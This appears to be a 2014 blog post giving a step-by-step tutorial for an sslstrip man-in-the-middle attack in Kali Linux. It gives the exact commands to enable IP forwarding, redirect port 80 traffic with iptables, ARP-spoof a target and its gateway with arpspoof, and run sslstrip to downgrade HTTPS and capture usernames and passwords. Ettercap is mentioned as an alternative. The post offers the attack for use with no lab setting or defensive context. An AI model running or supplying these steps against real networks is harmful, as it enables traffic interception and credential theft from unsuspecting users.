Tuesday 5 August 2014

how to use SSLstrip in kali linux:

what is sslstrip-
sslstrip is a MITM attack tool that allows to
attacker manipulates the traffic & capture
data such as user name and password.
how it works for-
it works for converting https request into
basic http request.
Step-1
for enabling ipforwarding so our computer
can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
Step-2
now we need configure ip table so that our
computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --
destination-port 80 -j REDIRECT --to-ports
8080
Step-3
for start ARP spoof
arpspoof -i <interface> -t <target ip> -r
<gateway ip>
Step-4
so now we need sslstrip in a new terminal
(don't close previous terminal)
sslstrip -l 8080
Note-you can done arp spoofing by ettercap

No comments:

Post a Comment